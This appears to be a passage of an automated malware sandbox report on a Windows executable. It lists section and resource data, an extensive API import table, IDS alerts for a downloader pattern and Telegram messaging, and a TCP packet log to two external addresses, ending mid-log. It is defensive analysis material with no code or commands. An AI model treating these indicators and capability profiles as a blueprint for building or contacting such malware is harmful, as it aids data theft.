                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0xd40000x351840x352009781137194ae32d11e469bd9976e19c7False0.8800091911764706data7.777513375929972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x10a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                      RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                      RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                      RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                      RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                      RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                      RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                      RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                      RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                      RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                      RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                      RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                      RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                      RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                      RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                      RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                      RT_RCDATA0xdc4100x2c81bdata1.0003620425784014
                                                                                                                      RT_GROUP_ICON0x108c2c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                      RT_GROUP_ICON0x108ca40x14dataEnglishGreat Britain1.15
                                                                                                                      RT_VERSION0x108cb80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                      RT_MANIFEST0x108d940x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                      UxTheme.dllIsThemeActive
                                                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishGreat Britain

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-01-11T06:49:11.042226+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949764193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:11.948460+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949764193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:12.512517+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949776104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:13.198467+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949782193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:13.763692+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949788104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:15.017568+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949796104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:17.567928+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949815104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:18.840277+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949826104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:20.233159+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949839104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:21.526975+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949847104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:22.457221+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949853149.154.167.220443TCP
                                                                                                                      2025-01-11T06:49:26.761020+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949883193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:27.651622+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949883193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:28.196656+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949893104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:28.932879+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949898193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:30.167266+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949906193.122.6.16880TCP
                                                                                                                      2025-01-11T06:49:33.261879+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949933104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:34.531438+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949943104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:37.046767+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949963104.21.32.1443TCP
                                                                                                                      2025-01-11T06:49:37.930589+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949969149.154.167.220443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 11, 2025 06:49:10.143270969 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:10.148225069 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:10.148300886 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:10.148556948 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:10.153389931 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:10.793009996 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:10.798657894 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:10.803493023 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:10.987989902 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.041279078 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.041321039 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.041388035 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.042226076 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:11.060849905 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.060868979 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.535141945 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.535278082 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.540290117 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.540306091 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.540760040 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.589230061 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.590292931 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.631365061 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.701664925 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.701829910 CET44349770104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.701931000 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.708244085 CET49770443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.711788893 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:11.716743946 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.901462078 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.904844046 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.904882908 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.904989958 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.905457020 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:11.905472040 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:11.948460102 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.382179976 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.385284901 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:12.385312080 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.512629032 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.512774944 CET44349776104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.513482094 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:12.513812065 CET49776443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:12.517580032 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.518886089 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.522572994 CET8049764193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.522691011 CET4976480192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.523750067 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:12.523829937 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.524004936 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:12.528740883 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.154721022 CET8049782193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.156092882 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.156152010 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.156214952 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.156476974 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.156491995 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.198467016 CET4978280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.633516073 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.635675907 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.635715008 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763688087 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763808966 CET44349788104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.763860941 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.764375925 CET49788443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:13.770236015 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.775125980 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:13.775183916 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.775276899 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:13.779995918 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.401853085 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.404727936 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.404784918 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.404860973 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.405092001 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.405107975 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.448466063 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:14.870985985 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:14.872975111 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:14.873013973 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017657995 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017817974 CET44349796104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.017947912 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.018256903 CET49796443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.022011995 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.023101091 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.027040005 CET8049792193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.027092934 CET4979280192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.027930021 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.027988911 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.028100967 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:15.032871962 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.689186096 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.690917015 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691025972 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.691121101 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691489935 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:15.691530943 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:15.729841948 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.154581070 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.156652927 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.156701088 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.289890051 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.289999962 CET44349807104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.290113926 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.290565014 CET49807443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.294382095 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.295677900 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.299380064 CET8049801193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.300497055 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.300563097 CET4980180192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.300623894 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.300710917 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:16.305469990 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.931375980 CET8049813193.122.6.168192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.960656881 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.960716963 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.960828066 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.961168051 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:16.961188078 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:16.979748011 CET4981380192.168.2.9193.122.6.168
                                                                                                                      Jan 11, 2025 06:49:17.418345928 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.420027018 CET49815443192.168.2.9104.21.32.1
                                                                                                                      Jan 11, 2025 06:49:17.420052052 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.567949057 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.568027973 CET44349815104.21.32.1192.168.2.9
                                                                                                                      Jan 11, 2025 06:49:17.568082094 CET49815443192.168.2.9104.21.32.1
